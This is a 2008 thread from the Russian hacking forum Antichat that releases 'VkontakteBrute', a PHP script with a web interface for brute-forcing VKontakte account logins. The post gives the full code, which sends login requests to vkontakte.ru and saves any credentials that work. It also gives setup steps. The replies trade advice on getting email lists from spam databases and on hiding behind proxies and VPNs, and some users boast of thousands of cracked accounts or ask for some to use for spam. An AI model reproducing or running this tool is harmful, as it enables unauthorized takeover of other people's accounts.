Форум АНТИЧАТ - [php] VkontakteBrute release

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)

- - [php] VkontakteBrute release (https://forum.antichat.xyz/showthread.php?t=73818)

[php] VkontakteBrute release

[ VkontakteBrute release ]

Описание:
Очередной брутфорс Вконтакте, теперь на php.

http://i051.radikal.ru/0806/52/61c826e3749e.png

Возможности:

Брут на один email по списку паролей
Брут на один пароль по списку email
Брут по списку email:password

Преимущества:

Графический интерфейс
Большое количество настроек
Простота
Скорость при одном потоке - 5 паролей в секунду
Работа на сервере

Требования:

PHP-хостинг с поддержкой сокетов

Установка и настройка:

Залить скрипт на сервер
Выставить права(chmod) на файл good.txt - 777
В файл dictionary.txt положить лист паролей или email'ov или список email:password
Запустить скрипт index.php и настроить его по своим нуждам.
Запустить и пойти пить пиво
Придти посмотреть пароли

PHP код:


		
			
<?php

#&-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-

#&          VkBrute v. 1.03 

#&     author Chaak(ICQ:868922) 

#&-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-





if(!isset($_POST['ok'])){

?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="ru">

<head>

    <title>.::Vkontakte brutforce by ChaaK::.</title>

    <style>

        body{

            background-color: black;

        }

        table{

            color: green;

            font-weight: bold;

        }

        h1{

            color: white;

        }

    </style>

</head>

<body>

    <center    style="margin-top:70px;">

    <form action="" method="POST">

        <h1>.::Vkontakte brutforce by ChaaK::.</h1>

        <table border="1" width="540" height="240">

            <tr><td valign="center" height="78" width="150">Тип атаки:</td><td valign="top">

            <table border="0" width="100%" height="100%">

                <tr><td><input name="attack" value="1" type="radio" checked="1"></td><td align="left">Атака на один email по списку паролей</td></tr>

                <tr><td><input name="attack" value="2" type="radio"></td><td align="left">Атака на один пароль по списку email'ов</td></tr>

                <tr><td><input name="attack" value="3" type="radio"></td><td align="left">Атака на список email:password</td></tr>

            </table>            

            </td></tr>

            <tr><td width="150" height="15px">E-mail</td><td style="font-size:12px"><input name="email" type="text" value="" size="33"> - для брута(для 1 вида атаки)</td></tr>

            <tr><td width="150" height="15px">Пароль</td><td style="font-size:12px"><input name="pass" type="text" value="" size="33"> - для брута(для 2 вида атаки)</td></tr>

            <tr><td width="150" height="15px">Словарь*</td><td><input name="dict" type="text" value="dictionary.txt" size="61"></td></tr>

            <tr><td width="150" height="15px">Хорошие пароли</td><td><input type="text" name="good" value="good.txt" size="61"></td></tr>

            <tr><td width="150" height="15px">Агент</td><td style="font-size:12px"><input type="text" name="user" value="Opera/9.50 (Windows NT 6.0; U; ru)" size="61"></td></tr>

            <tr><td width="150" height="15px">Время работы*</td><td style="font-size:13px"><input type="text" name="time" value="0" size="5"> - время работы скрипта в минутах, если 0 - то бесконечно.</td></tr>

            <tr><td colspan="2"><input type="submit" name="ok" value="::Начать работу::" style="width: 530px; height: 39px; background-color: black; color: green;"></td></tr>

        </table>

    </center>

    </form>

</body>

</html>

<?php

}else{

set_time_limit(($_POST['time'])*60); 



#############################################

$email = $_POST['email'];            

$passw = $_POST['pass'];                           

$dict = @file($_POST['dict']);                

$type= $_POST['attack'];                                         

$result = $_POST['good'];                        

$user_agent = $_POST['user'];

#############################################



function brute($email,$pass) {    

    $fp=fsockopen("vkontakte.ru",80,$errno,$errstr,10);    

    $out = "GET /login.php?email=".$email."&pass=".$pass." HTTP/1.0\r\n";    

    $out .= "Host: vkontakte.ru\r\n";    

    $out .= "User-Agent: ".$GLOBALS['user_agent']."\r\n";    

    $out .= "Cookie: income=1\r\n";    

    $out .= "Content-Type:text/xml; charset=windows-1251\r\n\r\n";    

    fwrite($fp,$out);        

  $ans='';   

  while(!feof($fp))   

  {   

  $ans.=fgets($fp,128);   

  }   

  fclose($fp);  

  unset($out);

  if(preg_match("/\b302 Found\b/is", $ans)) return true; else return false;   

}





if($type==1){

    for($i=0;$i<count($dict);$i++){ 

        $dict[$i]=trim($dict[$i]);

            if(brute($email,$dict[$i])){ 

                $fp=fopen($result,'ab'); 

                fwrite($fp,$email.':'.$dict[$i]."\n"); 

                   fclose($fp);         

                exit(); 

            }

        unset($dict[$i]);

        ob_implicit_flush(); 

    }

}elseif($type==2){

    for($i=0;$i<count($dict);$i++){ 

        $dict[$i]=trim($dict[$i]);

            if(brute($dict[$i],$passw)){ 

                $fp=fopen($result,'ab'); 

                fwrite($fp,$dict[$i].':'.$passw."\n"); 

                fclose($fp);        

            }

        unset($dict[$i]);

        ob_implicit_flush(); 

    }

}elseif($type==3){

    for($i=0;$i<count($dict);$i++){ 

        $dict[$i]=trim($dict[$i]);

            $array = explode(":",$dict[$i]);    

                if(brute($array[0],$array[1])){

                    $fp=fopen($result,'ab'); 

                    fwrite($fp,$array[0].':'.$array[1]."\n"); 

                    fclose($fp);  

                }

        unset($dict[$i]);

        ob_implicit_flush(); 

    }

}

echo "Брут завершен! Смотрите результаты в файле <a href='$result'>$result</a>";

}

?>

Автор ©ChaaK 2008

щас заценим.

красиво выглядит, а с поддержкой сокетов какие хостинги фришные есть?

А где там потоки править?

Цитата:

Сообщение от ChaaK

Там один поток. Многопоточность пока у меня в разработке.

изобретёшь новый php? пыха потоки не поддерживает

имхо добавь ещё игнор юзер аборт чтоб закрывать можно было

Цитата:

изобретёшь новый php? пыха потоки не поддерживает

Мб он с помощью форка сделает подобие

боян брут на пхп бред полный
я это говорил говорю и буду говорить
вот kaimi хороший брут сделал тока вот памяти многовато кушает а так норм

Цитата:

ты поди пару лямов мыл загрузил)))у мя тоже самое

_http://www.seoblog.com.ua/2007/03/20/multiplexing-in-php/
Подобие многопоточности.

Цитата:

Сообщение от Sharky

изобретёшь новый php? пыха потоки не поддерживает

Погугли: "многопоточность php неблокируемые сокеты"

Где брать мыльники? =\

Походу актуален только первый вид подбора...
Так как врядли у когото есть база логинов(мыльников) ВК....

многопоточности в php нет и ещё явно долго не будет..всё о чём вы говорите это псевдо многопоточность

Isis
Ну и вопрос!

Mr.Tech
Жжош. И зачем тебе непременно ВСЕ мыльники вконтакта? :)

Sharky
Да это псевдомногопоточность, и она отлично подходит для поставленной задачи :)

P.S.
т.к. мой ip блокировал контакт, то мне понадобилась поддержка прокси. В общем держите кому надо - тот же скрипт только работающий через проксю + убран баг с user-agent
http://rapidshare.com/files/122727090/index.php.html

diehard, в брутуре есть фуекция брут по списку мыльников... Так где их взять? ))

Цитата:

Сообщение от Mr.Tech

diehard, в брутуре есть фуекция брут по списку мыльников... Так где их взять? ))

Как где?
Скачай спам базу!

http://depositfiles.com/ru/files/5823332

Как вы уже заебали....
пиздец ща этих брутеров расплодилось, ток толку с них а??? на аки стоят не такие уж и простые пароли, хоть ктото хоть один пароль сбрутил?
Ща модная тенденция, брать чужие сорцы смотреть , немного их переделывать и выкладывать свою версию, не задумываясь а нужен ли вобще данный скрипт комуто, пытаясь тем самым показать какой ты охуенный php кодер

есле честно то уже достали всякий мусор выкладывать, и создавать для этого отдельные темы, ужеб в одной все выкладывали...

фтопку все эти говнотулзы!
пишите лучше сплоенты под булку и дле!

Цитата:

Сообщение от ChaaK

[*]Испарвлен баг, изза которого файл подкачки на unix-серверах забивался

Фига...таки на всех "unix-серверах" есть файл подкачки? :))) Не знал :)

дедик небось виндовый? )))

у меня такая трабла: после старта брута он моментально выдает "Брут завершен! Смотрите результаты в файле good.txt" good.txt естно пустой)) (хост с сокетами и set_time)...

mr.TECH
А ты подумай: это самый популярный ресурс в ру-нете. Да подойдет любая спам-база майл.ру

nc.STRIEM
Ты вообще по вконтакту работаешь? Если нет - зачем вообще говорить по теме в которой не рубишь?

>>diehard
да работаю

скажи мне, сколько ты сбрутил аков?

Цитата:

Сообщение от nc.STRIEM

>>diehard
да работаю

скажи мне, сколько ты сбрутил аков?

5 тысяч за 3 дня перловыми скриптами.

Цитата:

5 тысяч за 3 дня перловыми скриптами.

Неслабо....

diehard - если сложно поделись парочкой на один пасс... Чисто в своих целях для спама... Заранее благодарю!

Пробывал тестить на 2ru.name - не хочет работать! Кто может посоветовать какие хостинги!?

Локалхост + впн - лучшая связка. А локалхост + впн + соксы - the best.

Ребят, вот у меня денвер стоит, только я к нету через прокси подключаюсь - прокатит ли так!? Т.е. локалхост и подключен через прокси к другому компу - а тот выходит в нет через впн!

Выложите плиз вновь скрипт! а то сылки все битые уже!

Цитата:

теперь на php.

Порадовало))ПХП несомненно лучше того же делфи для брута :)

Ну че кто нить выложит!?

возможно вопрос покажится глупым, но всё же прошу на него ответить, чём открыть vchat flash 8.fla, может кто ссылку даст )

значит Macromedia Flash мне попался какойто не такой, если у меня не получилось им открыть o_O

не получаеться у меня что-то настроить этот скрипт =( возможно проблема с хостингом, подскажие кто откуда брутит?

Ссылка битая! У кого есть - перезалейте - и если можно - скиньте мне в пм! С меня +3!

Цитата:

Сообщение от Isis

Порадовало))ПХП несомненно лучше того же делфи для брута :)

Почему?
В PHP нет многопоточности, он медленный... чем же он лучше?

писать брут хоть чего на пхп это глупость

В общем поставил на хост с сокетами! Права выставил! Прописал рабочий прокси! Жму начать работу и выскакивает:

Цитата:

Вы пытались получить доступ к адресу http://*****/.ru/, который сейчас не доступен. Убедитесь, что веб-адрес (URL) введен без ошибок, и попытайтесь перезагрузить страницу.

Кто на хосте тестил - у кого работает!?